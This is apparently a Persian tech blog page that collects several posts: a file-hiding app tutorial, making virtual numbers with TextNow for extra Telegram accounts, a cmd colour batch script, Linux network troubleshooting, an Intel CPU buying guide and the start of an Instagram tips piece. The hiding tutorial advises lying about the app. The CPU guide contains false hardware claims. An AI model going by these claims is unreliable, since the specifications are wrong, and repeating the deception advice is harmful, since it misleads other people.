و اینکه دقت کنین اگه مورد اول انتخاب بشه یعنی فقط عددی و مورد دوم هم یعنی میتونیم یه چیز ترکیبی بزنیم :)

از اونجایی که من دارم پست آموزشی مینویسم پس به همون پسوورد پیشفرض پسنده میکنم و 8888 رو به عنوان رمز انتخاب میکنم

پس بعد از انتخاب و تایید پسوورد پیشفرض با تصویر پایین روبرو میشم

بعدا باید یه ایمیل بازیابی تنظیم کنیم که من ایمیلی رو تنظیم میکنم.

بعد از تایید یه پیغام میده و میگه که ایمیل شما تنظیم شده و شما بعدا میتونین از تنظیمات اون رو تغییر بدید.

حالا نوبت به دادن دسترسی به برنامه میرسه که ممکنه برای بعضیا نمایش داده بشه و برای بعضیا هم نه

ولی اگه با تصویر پایین روبرو شدین روی Ok کلیک کنید و دسترسیارو به برنامه بدین.

حالا کار تنظیمات تموم شده و شما با صفحه پایین روبرو میشید که باید دوباره لوگورو لمس کنین و چند لحظه نگه دارین تا ازتون رمز رو بخواد و بعد از زدن رمزتون با صفحه ی پایین روبرو میشید

اگه تصویر بالارو یه نیم نگاه بندازین متوجه میشین که این برنامه خیلی امکانات به ما میده و خیلی کارها میتونیم باهاش انجام بدیم

مثلا مخفی کردن برنامه و تصاویر و پیام ها و و و

اما دقت کنین برای مخفی کردن بعضی موارد باید گوشیتون روت شده باشه

به عنوان مثال اگه بخواین یه برنامه رو مخفی کنید ازتون دسترسی رووت میخواد

حالا کار ما تقریبا تموم شده و شما برای تست میتونین روی Music کلیک کنید و بعدش برای اینکه بهتر متوجه مخفی شدن فایلاتون بشید تمامی فایلای موسیقی رو انتخاب و روی گزینه ی Hide selected files بزنین تا اونارو توی پوشه ی مد نظرتون ذخیره کنه

حالا وقتی که به نرم افزار پخش موسیقی رو اجرا کنید میبینید که هیچ فایل صوتی پیدا نمیشه :|

پیشنهاد میکنم اگه منوی گوشیتون اجازه ایجاد پوشه میده یه پوشه ایجاد کنین و یکسری خرت و پرت مثل ماشین حساب و اینجور چیزا داخلش قرار بدین و در آخر برنامه Audio Manager رو هم توی لا به لای اون بندازین که کسی گیر نده این چیه

یا اگه هم بهتون گیر دادن.

بگین این برنامه برای تنظیم صدای گوشی هستش و سعی کنین تا آخرین لحظه ی به فنا رفتن چیزی نگین :)

دانلود برنامه Audio Manager

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

آموزش ساخت شماره مجازی

سلام به کاربران عزیز وب dedsec راستش تو گروه ها و کانالای زیادی دیدم که بعضیا اقدام به فروش شماره مجازی میکنن. گفتم تو این پست روش ساختش رو بگم تا شما هم راحت بتونین واس خودتون به طور رایگان شماره مجازی درست کنین و به راحتی باهاش وارد تلگرام یا هرجای دیگه شین.

اگه نمیدونید شماره مجازی چیه تو گوگل یه سرچ کنین راجبش، ولی در خلاصه بگم که با شماره مجازی میتونین یه اکانت جدید برا خودتون تو تلگرام و هر مسنجر دیگه درست کنین، مثل اینکه یه سیمکارت دیگه در اختیار دارین ولی با شماره خارجی. خب بریم سر اصل مطلب.

اول برای اینکار ما نیاز به برنامه تکست نو TextNow داریم که برای سیستم عامل اندرویده، که تو گوگل سرچ و دانلودش کنید، فک کنم حجمش حدودا سی و خوردهی مگابایت باشه. سعی کنید نسخه 6.35 رو دان کنید.

بعد از دانلود و نصب تکست نو روی گوشیتون، بهتره روی Continue with Google بزنید تا یه حساب گوگل به شمارتون اختصاص بدین.

خب، حالا اگر حساب گوگلی دارید، انتخاب کنید، در غیر اینصورت یه حساب اضافه کنید، برای اضافه کردن حساب روی استفاده از حسابی دیگر بزنید و آدرس و رمز حساب گوگل را وارد کنید.

خب حالا، یه پیش شماره دلخواه بنویسید که تعریف شده باشه، این کد مشخص میکنه، شماره مجازیتون از چه کشوریه، که من 320 رو وارد کردم که مال آمریکاست.

خب حالا روی Continue بزنید و صبر کنید تا درخواست شما تایید بشه، سپس لیستی از شماره ها براتون به نمایش درمیاد که به دلخواه یه شماره رو انتخاب کنید و روی Continue بزنید.

شماره مجازی شما ساخته شد و حالا آماده استفاده است، حالا میتونید وارد تلگرام بشید و یه اکانت جدید ادد کنید و شماره مجازیتون رو بنویسید و کشور رو همون کشور شماره مجازیتون انتخاب کنید که من آمریکا رو انتخاب کردم.

خب حالا صبر کنید تا کد تایید از طریق برنامه تکست نو براتون ارسال بشه:

حالا وارد اکانتتون بشید و از اکانت جدیدتون لذت ببرید.

اینم از آموزش ساخت شماره مجازی، حالا هرچقد دوست دارید حساب گوگل ادد کنید و به طور رایگان برا خودتون شماره مجازی و اکانت درست کنین.

dedsec will give you the truth
join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

تغییر رنگ هر خط در خط فرمان cmd

توی این پست کدهای تغییر رنگ هر خط توی خط فرمان رو قرار میدم

این پست رو به درخواست یه بنده خدایی نوشتم بخاطر همین زیاد توضیح نمیدم

کدهای پایین رو با پسوند bat یا cmd ذخیره و اجرا کنید.

@Echo Off
Title dedsec
Mode 50,20
Cls

For /F "tokens=1,2 delims=#" %%a in ('"prompt #$H#$E# & echo on & for %%b in (1) do rem ViRus32.Blog.IR"') do (
    set "DEL=%%a"
)

Call :RangMatn 0a "SABZ"
Echo. && Pause
Call :RangMatn 0C "GHERMEZ"
Echo. && Pause
Call :RangMatn 0E "ZARD"
Echo. && Pause
Call :RangMatn F "SEFID"
Echo. && Pause
Goto :eof
:RangMatn
echo off
<nul set /p ".=%DEL%" > "%~2"
findstr /v /a:%1 /R "^$" "%~2" nul
del "%~2" > nul 2>&1
Goto :eof

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

مشکل عدم اتصال به اینترنت در لینوکس

برطرف کردن مشکل عدم اتصال به اینترنت در لینوکس

شاید برای شما هم که دارنده یک سرور لینوکسی و یا سیستم عامل Desktop لینوکسی هستید مشکل عدم اتصال به اینترنت و یا افت شدید سرعت اینترنت به وجود آید و یا در برنامه خاصی اینترنت شما اصلا کار نکند. در این مقاله روش هایی را بررسی خواهیم کرد که مشکلات ناشی از عدم اتصال به اینترنت در لینوکس را برطرف می کند.

قبل از هر کاری باید با دستور زیر از وصل بودن اینترنت خود در لینوکس مطمئن شویم. این دستور dns گوگل می باشد و در صورت اتصال اینترنت باید ping آن کامل باشد.

1	ping -c 4 8.8.8.8

خروجی دستور بالا باید به صورت زیر باشد. در غیر این صورت احتمال قطعی اینترنت شما وجود دارد.

PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.

۶۴ bytes from 8.8.8.8: icmp_seq=1 ttl=58 time=1.68 ms

۶۴ bytes from 8.8.8.8: icmp_seq=2 ttl=58 time=1.70 ms

۶۴ bytes from 8.8.8.8: icmp_seq=3 ttl=58 time=1.71 ms

۶۴ bytes from 8.8.8.8: icmp_seq=4 ttl=58 time=1.69 ms

--- ۸٫۸٫۸٫۸ ping statistics ---

۴ packets transmitted, 4 received, 0% packet loss, time 3005ms

rtt min/avg/max/mdev = 1.686/1.699/1.718/0.051 ms

مواردی را که امکان دارد عدم اتصال به اینترنت در لینوکس را برای ما برطرف سازد عبارتند از:

چک کردن سرور DNS
راه اندازی مجدد سرویس اینترمت
تنظیمات کارت شبکه
بررسی و عیب یابی کارت شبکه
تنظیمات فایروال (firewall)
و …

بررسی سرور DNS

برای چک کردن DNS دستور زیر را در محیط ترمینال وارد کنید:

1	sudo cat /etc/resolv.conf

خروجی دستور باید به صورت زیر باشد:

1 2	nameserver 1.1.1.1 nameserver 1.0.0.1

اگر خروجی شما چیزی جز این باشد، می توانید آن را با دستور nano ویرایش کرده و متن بالا را در آن قرار دهید.

1	sudo nano /etc/resolv.conf

و سپس با گرفتن کلید ترکیبی CTRL و X و بعد از آن با Y تایید و فایل را سیو کنید.

راه اندازی مجدد سرویس اینترنت

اگر روش های گفته شده مشکل قطعی اینترنت شما را در لینوکس حل نکردند با دستور های زیر سرویس اینترنت سیستم عامل خود را ریستارت کنید زیرا امکان دارد برخی سرویس ها دچار مشکل شده باشند و با این کار مجدد به حالت پیشفرض خود برگشته و مشکل قطعی اینترنت شما را برطرف کنند.

دستور ریستارت کردن سرویس های اینترنت برای سیستم عامل های Ubuntu و debian و kalilinux

1	sudo service networking restart

دستور ریستارت کردن مدیر شبکه

1	sudo service network-manager restart

دستور ریستارت کردن سرویس های اینترنت برای سیستم عامل های RedHAT و CentOS

1	sudo service network restart

تنظیمات کارت شبکه

یکی از دلایلی هم که بسیار موثر است غیرفعال شدن کارت شبکه می باشد که با دستور زیر می توانیم صحت کارکرد کارت شبکه لینوکس خود را چک کنیم.

ip addr

کارت شبکه من با نام eth0 در اینجا وجود دارد و همانطور که میبینید از router آی پی گرفته و مشکلی در کانفیگ کارت شبکه وجود ندارد ولی اگر برای شما ip نداشت دستورات بعدی را اجرا کنید.

eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000

link/ether 00:50:56:34:4b:8e brd ff:ff:ff:ff:ff:ff

inet 192.168.43.10/24 brd 192.168.43.255 scope global dynamic noprefixroute eth0

valid_lft 3293sec preferred_lft 3293sec

inet6 fe80::250:56ff:fe34:4b8e/64 scope link noprefixroute

valid_lft forever preferred_lft forever

همچنین امکان دارد در سیستم شما نام کارت شبکه متفاوت باشد. پس اسم کارت شبکه خود را در دستور زیر جایگزاری کنید.

برای فعال کردن کارت شبکه های غیر فعال از دستور زیر استفاده کنید.

1	sudo ifup نام کارت شبکه

برای غیر فعال کردن کارت شبکه های فعال از دستور زیر استفاده کنید.

1	sudo ifdown نام کارت شبکه

اگر کارت شبکه شما ارور داد و غیر فعال نشد از این دستور می توانید استفاده کنید.

1	sudo ifdown --force نام کارت شبکه

برای فعال کردن آن نیز از دستور زیر استفاده کنید.

1	sudo ifup نام کارت شبکه

بررسی و عیب یابی شبکه

برای بررسی شبکه اینترنت و isp می توانیم از دستور زیر استفاده کنیم تا مکان قطعی اینترنت خود را پیدا کنیم.

برای debian و ubuntu

1	traceroute -4 8.8.8.8

برای RedHat و CentOS

1	tracepath 8.8.8.8

اگر پروسه به صورت کامل و درست انجام شود خروجی اینگونه می باشد:

traceroute to 8.8.8.8 (8.8.8.8), 30 hops max, 60 byte packets

۱ _gateway (192.168.43.1) 3.368 ms 3.367 ms 3.432 ms

۲ * * *

۳ ۱۰٫۴۰٫۷۲٫۱۷ (۱۰٫۴۰٫۷۲٫۱۷) ۸۴٫۵۰۱ ms 96.662 ms 96.555 ms

۴ ۱۰٫۴۰٫۷۲٫۱ (۱۰٫۴۰٫۷۲٫۱) ۹۶٫۱۱۴ ms 96.044 ms 96.294 ms

۵ ۱۰٫۴۰٫۷۳٫۳۳ (۱۰٫۴۰٫۷۳٫۳۳) ۹۹٫۳۵۰ ms 96.353 ms 99.129 ms

۶ * * *

۷ ۱۰٫۴۰٫۶۹٫۶۵ (۱۰٫۴۰٫۶۹٫۶۵) ۶۶٫۸۱۳ ms 66.721 ms 65.910 ms

۸ ۱۰٫۴۰٫۶۹٫۹۸ (۱۰٫۴۰٫۶۹٫۹۸) ۶۴٫۰۹۰ ms 64.000 ms 63.533 ms

۹ ۱۰٫۰٫۱۱٫۱۶۹ (۱۰٫۰٫۱۱٫۱۶۹) ۶۳٫۴۵۷ ms 62.483 ms 62.386 ms

۱۰ ۱۰٫۰٫۷۷٫۲۰ (۱۰٫۰٫۷۷٫۲۰) ۶۲٫۰۱۳ ms 79.632 ms 79.657 ms

۱۱ ۱۰٫۰٫۷۷٫۱ (۱۰٫۰٫۷۷٫۱) ۸۳٫۴۱۲ ms 82.312 ms 82.575 ms

۱۲ ۱۰٫۰٫۷۲٫۳۴ (۱۰٫۰٫۷۲٫۳۴) ۸۴٫۹۹۱ ms 84.919 ms 79.934 ms

۱۳ ۱۰٫۰٫۷۷٫۱۱۸ (۱۰٫۰٫۷۷٫۱۱۸) ۷۹٫۸۱۱ ms 79.429 ms 103.539 ms

۱۴ ۱۰٫۰٫۷۷٫۱۱۰ (۱۰٫۰٫۷۷٫۱۱۰) ۸۳٫۹۰۴ ms 82.089 ms 80.381 ms

۱۵ ۱۰٫۲۱٫۲۵۲٫۲۴۶ (۱۰٫۲۱٫۲۵۲٫۲۴۶) ۸۰٫۴۱۷ ms 80.624 ms 80.545 ms

۱۶ ۱۰٫۲۱٫۷۱٫۲۰ (۱۰٫۲۱٫۷۱٫۲۰) ۹۱٫۹۲۷ ms 89.772 ms 89.220 ms

۱۷ ۱۰٫۲۱٫۷۱٫۲۰ (۱۰٫۲۱٫۷۱٫۲۰) ۹۲٫۰۰۴ ms 91.606 ms 91.540 ms

۱۸ ix-et-4-0-5-0.tcore1.fnm-frankfurt.as6453.net (195.219.156.148) 207.375 ms 10.21.0.21 (10.21.0.21) 92.005 ms 90.894 ms

۱۹ ۱۰٫۲۱٫۰٫۲۱ (۱۰٫۲۱٫۰٫۲۱) ۸۰٫۳۴۵ ms if-ae-9-2.tcore2.fr0-frankfurt.as6453.net (5.23.30.17) 196.298 ms 196.007 ms

۲۰ if-ae-45-2.tcore1.fr0-frankfurt.as6453.net (195.219.50.20) 188.921 ms 195.807 ms et-5-0-0-0.ffttr6.-.opentransit.net (193.251.154.103) 168.200 ms

۲۱ ۷۲٫۱۴٫۲۱۴٫۵۲ (۷۲٫۱۴٫۲۱۴٫۵۲) ۱۶۷٫۵۵۲ ms google-13.gw.opentransit.net (193.251.252.246) 167.360 ms *

۲۲ ۱۰۸٫۱۷۰٫۲۵۱٫۱۲۹ (۱۰۸٫۱۷۰٫۲۵۱٫۱۲۹) ۱۷۵٫۲۷۴ ms * 135.098 ms

۲۳ * ۷۲٫۱۴٫۲۳۲٫۳۳ (۷۲٫۱۴٫۲۳۲٫۳۳) ۱۳۴٫۹۷۰ ms dns.google (8.8.8.8) 164.028 ms

تنظیمات FireWall

بعد از چک کردن ارتباط و درست بودن آن باید رول های فایروال را چک کنیم. به این منظور از دستور زیر استفاه می کنیم.

1	sudo iptables -L

فایروال iptabels تمام پورت ها و برنامه های متصل به اینترنت لینوکس را چک می کند.

Chain INPUT (policy ACCEPT)

target prot opt source destination

ACCEPT all -- anywhere anywhere the RELATED,ESTABLISHED

ACCEPT tcp -- anywhere anywhere The firewall dpt:http

ACCEPT tcp -- anywhere anywhere tcp dpt:ssh

DROP all -- anywhere anywhere

Chain FORWARD (policy ACCEPT)

target prot opt source destination

Chain OUTPUT (policy ACCEPT)

target prot opt source destination

برای مثال ما در اینجا برای دسترسی های http و ssh به سرور محدودیت هایی اعمال کردیم و شما چک کنید که کدام گزینه باعث مسدود کردن ping در سرور و یا سیستم شما می شود.

امیدواریم روش های گفته شده برای مشکل شما راه حل مناسبی باشد.

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

بهترین پردازنده‌ اینتل کدام است؟

یک پردازنده‌ی جدید نیاز دارید؟ در این مقاله ما نگاهی به بهترین پردازنده های اینتل خواهیم داشت از چیپست های استفاده شده در لپتاپ های ارزان قیمت تا غول های اجرای بازی مثل PS4 و یا لپتاپ گیمینگ.

هدف ما کمک به شما برای پیدا کردن بهترین پردازنده‌ای است که مناسب استفاده شما از کامپیوتر می‌باشد. ممکن است همین مقاله کمک کند تا شما لپتاپی را که دلخواه شما است خریداری کنید البته اگر از آن دسته افرادی هستید که برای خرید یک سیستم خوب ساعت ها وقت برای پیدا کردن مناسب‌ترین گزینه می‌گذارید.

نسل ۱۰ام سری آیس‌لیک از ‌آخرین خبر‌های دنیای پردازنده حساب می شود شما هم می‌توانید از فروشگاه های آنلاین خریداری کنید اما شاید فکر کنید که چه تفاوتی بین نسل ۹ام یا حتی ۸ام این پردازنده ها وجود دارد؟؟

در ابتدا چند مورد از مشهودترین توصیه ها برای خرید پردازنده را برایتان شرح میدهیم.

پردازنده های موجود برای سیستم های فوق سریع و اجرای بازی های روز

بهترین پردازنده‌ اینتل کدام است؟

اگر تنها یک پردازنده برای اجرای دستورات سنگین وجود داشته باشد آن intel core i9 9900kxp می‌باشد. این پردازنده‌ی ۸ هسته‌ای غول پردازنده های رومیزی بهینه ترین نسخه پردازنده‌ی core i9 می‌باشد . این پردازنده بهترین نوع در کنار کارت گرافیگ های سطح بالا و سیستم خنک کاری آنها می‌باشد.

البته ممکن است اکثر مردم نسخه ارزان تر core i9 را هم ترجیح دهند. این نسخه ها سرعت پردازشی کمتری نسبت به سری بالاتر خود را دارد اما تفاوتی فاحشی بین این دو نسخه را نمی‌توانید در دنیای واقعی ببینید البته در کنار قدرت پردازشی کمتر آن قیمت آن نیز بسیار ارزان‌تر خواهد بود.

نقطه ی شروع: intel corei5-9600 & i5-9400

پردازنده‌ی Core i5-9400 مبدا پردازنده‌های سطح متوسط شرکت اینتل می‌باشد. خرید قابل اعتمادی می‌باشد اما با کمی بودجه‌ی بیشتر می‌توانید نسخه‌ی i5-9600 را خریداری کنید که کلی سطح پردازشی شما را جلوتر می‌برد.

این پردازنده ها را می‌توانید در کنار کارت گرافیک های سطح بالا استفاده کنید وجود حرف K” در آخر این سری از پردازنده ها نشان از اورکلاک شدن این پردازنده می‌باشد. اگر استفاده‌ی متوسطی از کامپیوتر خود دارید سری core i5-9400 هم جوابگوی نیاز شما خواهد بود.

نگاهی به پردازنده های لپتاپ : Intel Core i7-10510U

در حال حاضر تمامی فروشگاه ها لپتاپ های نسل ۱۰ام پردازنده های

اینتل را دارند. حتی مدل های این سری از حد معمول نیز بیشتر می باشد همین تعداد زیاد در مدل های مختلف باعث سردرگمی در انتخاب مناسب ترین پردازنده می باشد. Intel core i7-10510U پردازنده‌ای خواهد بود که شما در لپتاپ های بالا رده و نازک Dell Xps 13 خواهید دید.

نتایج بنچمارک ها نشان می‌دهد که در حدود ۱۵٪-۲۵٪ سریعتر نسبت به نسخه قبلی این پردازنده (i7-8565U) می‌باشد.

بهترین پردازنده اینتل : تفاوتی میان نام های این مدل

شرکت اینتل پردازنده های زیادی را تولید کرده و پیدا کردن گزینه مناسب شما از میان ده ها نوع پردازنده کار آسانی نخواهد بود. اما این کد ها و اعداد چه معنی خاصی در پردازنده خواهند داشت؟؟

باور غلط و عمومی این است که عدد بعد از حرف i تعداد هسته های پردازنده را نشان می‌دهد اما اشتباه بوده و آنچه که مشخص است اعداد در کنار هر مدل از پردازنده های اینتل Core i3- i5- i7 –i9 نشان از میزان قدرت بیشتر در اعداد بالاتر می باشد. شما می توانید بر اساس نیاز خود یکی از این مدل ها را انتخاب کنید اما تاکید ما در سری و نسل این نوع پردازنده ما می‌باشد.

در هر مدل از پردازنده ها هرچه نسل بالاتری را انتخاب کنید قدرت پردازشی بیشتر، معماری ساخت بهینه تر در نتیجه مصرف کمتر انرژی و گرمای کمتر تولید شده را خواهید داشت در حال حاضر نسل ۱۰ام پردازنده های اینتل موجود می باشد که بهترین انتخاب در هر مدل می‌باشند.

نکته ی بعدی در پردازنده های اینتل حروف های آنها می‌باشد. در پردازنده های نسل ۸ام و قبل تر از آن داستان متفاوت بود و شما می‌بایست بین حروفU” , HQ” , Y” یکی را انتخاب می‌کردید. اما در نسل های جدید حرف G” نشان از مناسب بودن این پردازنده ها برای بازی های کامپیوتری می‌باشد. البته زیاد عجیب نیست ک پردازنده های سری Ryzen از شرکت AMD قدرت بیشتری داشته باشند و این یعنی اینتل باید با این شرکت رقابت کند به همین دلیل سری G” گزینه مناسبی در مقابل این رقیب می‌باشد.

پیشنهاد ما خرید گرافیک های Onboard” با مصرف کمتر برای اجرای بازی های AAA در کیفیت ۱۰۸۰p بدون خرید کارت گرافیک های اضافی می باشد.

در هر حال هنوز سری های U” و Y” برای نسل دهم پردازنده های اینتل موجود می‌باشد که هدف آنها اجرای بازی نمی‌باشد. برای مثال لپتاپ Dell xps13 از پردازنده i7-10710U استفاده میکند مزیت این نوع سری بوست کردن قدرت هوش مصنوعی با اینترنت پرسرعت Wi-Fi 6 gig+ می‌باشد.

برای پردازنده های کامپیوتر های رومیزی نیز مدل های متفاوتی مشاهده می‌کنید که در کنار مدل از حرف”F” استفاده شده است این بدین معنی است که این نوع پردازنده هیچ کارت گرافیک سخت افزاری بر روی آن نصب نشده است البته نگران کننده نیست چرا که شما یک سیستم حرفه ای بازی نیاز دارید و در این صورت باید از غول های کارت گرافیکی استفاده کنید تا از قدرت آن لذت ببرید.

حرف K” در کنار هر مدل از پردازنده ها این قابلیت را به پردازنده می‌دهد تا قدرت پردازش را Overclock” کند در این صورت شما یک سیستم خنک کننده مناسب نیز برای خنک کردن این نوع پردازنده احتیاج خواهید داشت تا دمای پردازنده از حد مجاز بالاتر نرود.

حروف X” و S” استفاده شده در پردازنده نشان می‌دهد که این نوع پردازنده می‌تواند عملیات بیشتری را با قدرت بیشتر انجام دهد.

اگر در آخر مدل و سری پردازنده حروفی نوشته نشده باشد آن پردازنده مناسب نوع دسکتاپ بوده و مدل استاندارد می باشد. اگر این اعداد و حروف ها و کد برای شما زیاده از حد مبهم بود یعنی شما یک پردازنده‌ای نیاز دارید تا درون کیس خود گذاشته و کار خود را انجام دهید پس این نوع پردازنده های استاندارد مناسب شما می‌باشد.

و اما چند توصیه ی بیشتر

با توجه به متن بالا شما انتظار دارید که هرچه اعداد در مدل های پردازنده بالاتر باشد به معنی آن است که قدرت بیشتری دارید اگرچه این تصور تا حدودی درست می‌باشد اما در مقایسه با نسخه ی دسکتاپ هر پردازنده این تصور اشتباه است .

Intel Core i3 پردازنده ی دسکتاپ آن ۴ هسته ی پردازشی دارد این نوع پردازنده بهترین قدرت را در قبال قیمت پرداختی ارایه می‌دهد اما از لحاظ تکنولوژی ساخت از مدل های بالاتر قدیمی‌تر می باشند یعنی تکنولوژی هایپر ترید را پشتیبانی نمی‌کند. در core i3 بوست پردازنده کمتر است در نتیجه نمی‌تواند در افزایش قدرت پردازشی موثرتر عمل کند .

هایپرترید یا به انگلیسی Hyper-threading قابلیتی است که به پردازنده می‌دهد تا هسته های پردازشی بیشتر را به صورت مجازی به پردازنده اضافه کند در نتیجه قدرت پردازش افزایش می‌یابد.

در پردازنده های core i5 دسکتاپ ۶هسته ی پردازشی وجود دارد همانند مدل core i3 این مدل نیز از هایپر تریت پشتیبانی نمیکند اما از بوست بیشتر در پردازنده نسبت به مدل core i3 برخوردار است.
در پردازنده های core i7 نیز ۶ یا ۸ هسته ی پردازشی در نسخه دسکتاپ آنها وجود دارد در این مدل بسته به سری آن میتوانید از قابلیت هایپرتریت استفاده کنید.
در پردازنده های core i9 ۸ هسته ی پردازشی وجود دارد این مدل بیشترین قدرت پردازشی را در بین پردازنده های شرکت اینتل دارد پس گزینه ی مناسبی برای خرید می باشد البته اگر نگران خالی شدن حساب بانکی تان نیستید J

پس انتخاب شما کدام مدل است؟

هایپرترید قدرت پردازشی مفیدی را در چندبرنامگی (MultiTasking) در اختیار می گذارد پس مناسب کسانی است که کار های گرافیکی و تدوین ویدیویی یا رندر های ۳بعدی انجام می دهند با این حال برای استفاده بازی مناسب نمی‌باشد زیرا بازی ها برای اجرا از تمام قدرت این مدل پردازنده استفاده نمی‌کنند این بدین معنی نیست که هیچ مزیتی به عنوان پردازنده بالارده ندارند اما مهم نیاز شما می‌باشد. پردازنده‌های بالارده سرعت پردازشی بیشتری نیز در کنار هسته های بیشتر دارند. (با افزایش تعداد هسته مقدار حافظه کش نیز بیشتر می‌شود این حافظه برای کار های پردازشی پردازنده می‌باشد که هرچقدر بیشتر باید کار ها روان تر انجام میشوند.)

یک پردازنده معمولی مثل Core i3 به میزان ۶مگابایت کش دارد این مقدار در پردازنده‌ی core i5 ۹مگابایت و در core i7 ۱۲مگابایت می‌باشد. این فقط یک نکته برای شما است تا بدانید سرعت پردازنده فقط به میزان قدرت پردازش مربوط نیست و عوامل مختلف دیگری نیز در نتیجه پردازش اثر گذار می باشد.

پردازنده های اینتل در لپتاپ

در قسمت لپتاپ ها اوضاع کمی متفاوت است در این مدل های لپتاپ، شما نسل های مختلفی از پردازنده های اینتل را خواهید دید که تاحدودی عجیب و سردرگم‌کننده هستند.

شما ممکن است بخاطر قیمت ارزنتر نسل های قدیمی تر مثل نسل ۸ام پردازنده ها را برای خرید انتخاب کنید این مدل ها فقط به دلیل گذر زمان و وجود نسخه بروزتر آنها تخفیف خورده اند اما میتوانند نیاز شما از یک پردازنده را حد بسیار زیادی مرتفع سازند.

امروزه اکثرا در لپتاپ ها از نسل ۹ام چیپست ها مانند core i7-9750H استفاده شود شاید شما فرض کنید که مدل core i7-10510U جدیدتر است اما هر دو در نیمه سال ۲۰۱۹ تولید شده اند.

اما تفاوت در چیست؟

آسان ترین راه برای فهمیدن TDM: thermal design power است یعنی میزان قدرت گرمایی. این متغییر به شما میگوید که پردازنده چه میزان گرما تولید میکند. مدل i7-9750H با قدرت گرمایی ۴۵وات نشان می دهد که برای لپتاپ های چاق‌تر و قدرت بیشتر طراحی شده اند.

مدل هایی با قدرت گرمایی (TDM) کمتر مثل i7-10510U همانند موتور های کم حجم در انواع خودرو سواری میباشند. و مدل هایی با قدرت گرمایی (TDM) بیشتر همانند خودرو هایی با موتور حجیم و اسپرت میباشد: قدرت بیشتر ، گرمای بیشتر، و مصرف انرژی بیشتر.

در آخر انتخاب کدام مدل بسته به نوع لپتاپی که انتخاب میکنید دارد زیرا پردازنده های با قدرت گرمایی بیشتر قابل نصب بروی لپتاپ های سبک و Ultra-slim نمی باشند. زیرا آنها سیستم خنک کننده مناسب برای دفع گرمای پردازنده را ندارند و باید توجه کنید که این پردازنده ها مصرف بیشتری نیز دارد پس نیاز به منبع انرژی بزرگتری دارند پس این نوع پردازنده ها مناسب لپتاپ های کوچک و نازک نمی باشند.

بهترین انتخاب برای شما

اگر از آن دسته افرادی هستید که تدوین ویدیویی یا رندر های ۳بعدی انجام می دهید نیاز به پردازنده قویتر و بهتر دارید.

اگر نیاز شما بازی یا استفاده معمولی از سیستم است گزینه های خوب دیگری مثل کامپیوتر های مخصوص بازی یا کامپیوتر رومیزی در دسترس است.

پردازنده ی Core i3 ویندوز ۱۰ را براحتی اجرا میکند با این استفاده از خافظه SSD محیط روانتری را برای شما ایجاد میکند.
لپتاپ های سری G” گزینه مناسب برای رفع نیاز بازیکن ها است چرا که در کنار پردازنده مناسب از کارت گرافیک های مناسبی نیز برخوردار هستند.
در مدل های دسکتاپ پردازنده های اینتل هیچ کدام مناسب کار های گرافیکی و بازی نمی باشند و شما علاوه بر خرید پردازنده باید یک کارت گرافیک مناسب نیز برای آن تهیه کنید .

برای مثال پردازنده Core i3-9100 با کارت گرافیک Nvidia GeForce RTX 2070 محیط روانتری با فریم های بیشتر نسبت به پردازنده ی Core i9-9900 با کارت گرافیک GeForce GTX 1650 خواهد داشت . ما پیشنهاد میدهیم یک پردازنده پایین رده مثل core i5-9400 انتخاب کنید اگر میخواهید یک کارت گرافیک بالارده و گران قیمت تهیه کنید.

کمی تخصصی تر

سرعت پردازنده چقدر باشد؟؟

میزان GHz نشان از سرعت پردازنده دارد که در بازه زمانی محاسبات چه مقدار پردازش در یک ثانیه انجام می شود. خیلی ساده بگوییم عداد بزرگتر به معنی سرعت بیشتر.

برای مثال ۳٫۶ GHz به معنی ۳میلیاردوششصد هزار (۳٫۶۰۰٫۰۰۰٫۰۰۰) بازه زمانی است. این مقدار نباید برای مقایسه پردازنده های خانواده مختلف استفاده شود با این حال همیشه عدد بزرگتر به معنی بهتر بودن نیست زیرا در نسل های مختلف پردازنده های intel و amd تفاوت هایی در میزان بهره وری در هر یک از این پردازنده ها وجود دارد. پس میزان محاسباتی که در پردازنده در بازه زمانی مشخص شده انجام میدهد مهم تر از میزان سرعت آنها است .

علاوه بر سرعت میزان بوست شدن پردازنده ها را نیز باید به مقایسه ها افزود . هر چه میزان بوست بیشتر باشد سرعت پردازنده نیز افزایش می یابد اما دمای تولید شده نیز افزایش می‌یابد که از بهره وری پردازنده می‌کاهد. با این حال پردازنده ها فقط زمان محدودی را میتوانند از بوست حداکثری استفاده کنند و بعد از آن توانایی بوست کاهش میباید تا دمای پردازنده کاهش یابد. در کارهای ویدیویی پردازنده تمام مدت در حالت بوست کار نمیکند تا دمای آن از حد مجاز بالاتر نرود و آسیبی به پردازنده وارد نشود.

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

۱۰ نکته مفید برای افزایش فالوور اینستاگرام

با افزایش محبوبیت شبکه های اجتماعی و بخصوص اینستاگرام در این روز ها افراد زیادی به سمت این شبکه اجتماعی دوست داشتنی جذب شده اند. از این رو اینستاگرام افراد را بر این داشت تا در صفحه ی مجازی خود نوعی کسب درآمد را تجربه کنند. درآمدی که با تعداد فالوور های شما رابطه مستقیم دارد. اما در این مقاله راه های مختلف و آسانی را برای جذب مخاطب و افزایش فالوور اینستاگرام برای شما آماده کرده ایم. با ما همراه باشید.

اینستاگرام برنامه‌ای فعالیت محور

در برنامه اینستاگرام اگر یک قانون برای دیده شدن وجود داشته باشد، آن هم فعال بودن صفحه شما است از پست های تازه گرفته تا لایک و کامنت در صفحه های افراد مشهور. پس نکته اصلی موفقیت شما در این شبکه اجتماعی به میزان فعالیت شما بستگی دارد. اما چگونه یک صفحه فعال در اینستاگرام داشته باشیم ؟؟ با توجه به فعالیت محور بودن اینستاگرام قدم اول افزایش فعالیت شما در این راستا می باشد. این افزایش فعالیت با نکات زیر میسر می شوند.

نوع پیج اینستاگرام

